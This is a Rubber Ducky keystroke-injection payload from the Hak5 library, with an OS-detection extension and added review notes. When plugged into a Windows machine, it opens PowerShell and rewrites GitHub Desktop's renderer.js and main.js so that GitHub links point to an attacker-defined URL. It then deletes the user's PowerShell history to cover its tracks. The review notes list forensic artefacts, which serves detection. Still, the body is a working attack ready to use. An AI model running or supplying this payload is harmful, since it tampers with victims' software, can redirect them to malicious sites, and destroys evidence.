hak5
GitHub Repository: hak5/usbrubberducky-payloads
Path: blob/master/payloads/library/execution/Replace_Links_In_GithubDesktop/payload.txt
REM_BLOCK
#####################################################
#                                                   #
#   Title        : Replace Links In GithubDesktop   #
#   Author       : Aleff                            #
#   Version      : 1.0                              #
#   Category     : Execution                        #
#   Target       : Windows 10/11                    #
#                                                   #
#####################################################
END_REM
REM REQUIRED - Define here the new URL that will replace the original GitHub links.
REM The PowerShell block further down uses #NEW_LINK as the replacement text
REM written into renderer.js and main.js.
DEFINE #NEW_LINK example.com

REM DON'T CHANGE - This is treated as a constant: the GitHub Desktop folder,
REM joined onto %USERPROFILE% by the PowerShell block further down. Change it
REM only if you are sure that GitHub Desktop is not installed in the default path.
DEFINE #SUBDIRECTORY \AppData\Local\GitHubDesktop
REM_BLOCK
    Credits: Hak5 LLC
    Website: https://hak5.org/
    Source: https://github.com/hak5/usbrubberducky-payloads/blob/master/payloads/extensions/passive_windows_detect.txt
END_REM

REM NOTE(review): in the lines shown, nothing after END_EXTENSION tests $_OS,
REM so in this payload the extension acts only as the dynamic boot delay and the
REM keystrokes that follow are sent whatever the detection result is.
EXTENSION PASSIVE_WINDOWS_DETECT
    REM VERSION 1.1
    REM AUTHOR: Korben

    REM_BLOCK DOCUMENTATION
        Windows fully passive OS Detection and passive Detect Ready
        Includes its own passive detect ready.
        Does not require additional extensions.

        USAGE:
            Extension runs inline (here)
            Place at beginning of payload (besides ATTACKMODE) to act as dynamic
            boot delay
            $_OS will be set to WINDOWS or NOT_WINDOWS
            See end of payload for usage within payload
    END_REM

    REM CONFIGURATION:
    REM #MAX_WAIT              - upper bound on the number of polls in the wait loop
    REM #CHECK_INTERVAL        - DELAY used between two polls
    REM #WINDOWS_HOST_REQUEST_COUNT - threshold compared with $_HOST_CONFIGURATION_REQUEST_COUNT
    REM #NOT_WINDOWS           - value stored in $_OS when the host is not classified as Windows
    DEFINE #MAX_WAIT 150
    DEFINE #CHECK_INTERVAL 20
    DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
    DEFINE #NOT_WINDOWS 7

    REM Start from NOT_WINDOWS; only the IF below can change the result.
    $_OS = #NOT_WINDOWS

    REM Wait loop: keeps polling while $_RECEIVED_HOST_LOCK_LED_REPLY is still FALSE,
    REM and gives up after #MAX_WAIT polls of #CHECK_INTERVAL each.
    VAR $MAX_TRIES = #MAX_WAIT
    WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
        DELAY #CHECK_INTERVAL
        $MAX_TRIES = ($MAX_TRIES - 1)
    END_WHILE
    REM The host is classified as Windows when it issued more than
    REM #WINDOWS_HOST_REQUEST_COUNT configuration requests during enumeration.
    IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
        $_OS = WINDOWS
    END_IF

    REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
        IF ($_OS == WINDOWS) THEN
            STRING HELLO WINDOWS!
        ELSE
            STRING HELLO WORLD!
        END_IF
    END_REM
END_EXTENSION
REM_BLOCK REVIEW NOTES
    What the keystrokes below do, in order:
      1. GUI r opens the Run dialog and starts an interactive PowerShell
         session; the two DELAY 1000 lines are fixed waits for each window.
      2. The typed script joins %USERPROFILE% with #SUBDIRECTORY, lists the
         app-* folders there and selects the one with the highest version.
      3. In resources\app\renderer.js every https:// URL that contains
         "github" is replaced with #NEW_LINK; URLs in which "api" appears
         are excluded by the negative lookahead and left as they are.
      4. In resources\app\main.js each openExternal("https://...github...")
         call is rewritten to openExternal("#NEW_LINK").
      5. The final line removes the file that
         (Get-PSReadlineOption).HistorySavePath points to and exits.

    Artefacts for detection and response:
      - renderer.js and main.js of the newest app-* folder are rewritten in
        place by Set-Content, so their content and last-write time differ
        from a clean install of the same version.
      - The PSReadLine history file of the logged-on user is deleted; its
        absence is an indicator in its own right.
      - The commands are typed into an interactive session, so PowerShell
        script block logging, where it is enabled, should still hold them
        after the history file is gone (confirm against local logging policy).
      - Only the app-* folder selected in step 2 is touched; reinstalling or
        updating GitHub Desktop presumably restores unmodified files
        (assumption, verify on the affected host).

    The lines between STRINGLN_POWERSHELL and END_STRINGLN are typed
    verbatim, so no comments are placed inside that block.
END_REM
GUI r
DELAY 1000
STRINGLN PowerShell
DELAY 1000

STRINGLN_POWERSHELL
$path = Join-Path -Path $env:USERPROFILE -ChildPath "#SUBDIRECTORY"

$folders = Get-ChildItem -Path $path -Directory | Where-Object { $_.Name -like "app-*" }

$versions = $folders | ForEach-Object {
[PSCustomObject]@{
FolderName = $_.Name
Version = [version]($_.Name -replace "app-", "")
}
}

$latestVersionFolder = $versions | Sort-Object Version -Descending | Select-Object -First 1

$latestFolderPath = Join-Path -Path $path -ChildPath $latestVersionFolder.FolderName
$latestFolderPath += "\resources\app\"
$renderer = "renderer.js"
$main = "main.js"

$filePath = "$latestFolderPath$renderer"

$fileContent = Get-Content $filePath
$regex = [regex]'(https:\/\/(?![\w\d\.\/\-]*api)[\w\d\.\/\-]*github[\w\d\.\/\-]+)'
$modifiedContent = $fileContent -replace $regex, '#NEW_LINK'
Set-Content -Path $filePath -Value $modifiedContent


$filePath = "$latestFolderPath$main"
$fileContent = Get-Content $filePath
$regex = [regex]'openExternal\("(https:\/\/[\w\d\.\/\-]*github[\w\d\.\/\-]+)"\)'
$modifiedContent = $fileContent -replace $regex, ('openExternal("#NEW_LINK")')
Set-Content -Path $filePath -Value $modifiedContent; Remove-Item (Get-PSReadlineOption).HistorySavePath; exit

END_STRINGLN